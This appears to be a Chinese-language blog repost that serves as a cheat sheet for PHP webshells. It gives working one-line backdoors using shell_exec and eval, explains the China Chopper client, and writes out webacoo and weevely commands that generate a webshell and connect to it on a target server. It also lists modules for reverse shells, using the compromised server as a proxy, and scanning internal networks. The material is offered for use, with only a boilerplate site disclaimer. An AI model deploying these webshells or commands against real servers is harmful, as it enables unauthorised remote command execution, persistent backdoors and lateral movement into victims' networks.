标签：webshell shell weevely 连接 服务器 php 好用

php经典一句话: <?php echo shell_exec($_GET['cmd']);?>

中国菜刀：
官网：www.maicaidao.co
原理：上传一句话(<?php @eval($_POST['我是密码']);?>)至服务器端，再用中国菜刀客户端(图形化界面)去连接服务器

webacoo(kali):
特点：传输的数据包裹在cookie中，并非http包体内，起到一定绕过作用
原理：生成webshell，上传至目标服务器，再拿webacoo去连接该webshell，返回可以执行系统命令的shell
缺点：不可设置专属连接密码
生成webshell： webacoo -g -o a.php
连接webshell： webacoo -t -u http://192.168.1.1/a.php

weevely(kali):
原理：生成webshell，上传至目标服务器，再拿weevely去连接该webshell，返回可以执行系统命令的shell
生成webshell：weevely generate 密码 a.php
连接webshell：weevely http://192.168.1.1/a.php 密码
特点：连接到目标服务器webshell后还可以调用内置的N多模块，在shell下输入help查看模块，直接在shell下输入模块名称使用模块

30多个管理模块举例：
1、执行系统命令、浏览文件系统
2、检查服务器常见配置错误
3、创建正向、反向TCP Shell连接
4、将目标服务器作为代理http服务器(肉鸡) ====>只需要在连接到的shell中输入net_proxy即可打开代理，此时会在本地监听127.0.0.1:8080，浏览器设置为该代理后所有流量将走目标服务器
5、从目标计算机运行端口扫描，渗透内网

标签：webshell,shell,weevely,连接,服务器,php,好用
来源： https://www.cnblogs.com/baihualin/p/10348539.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。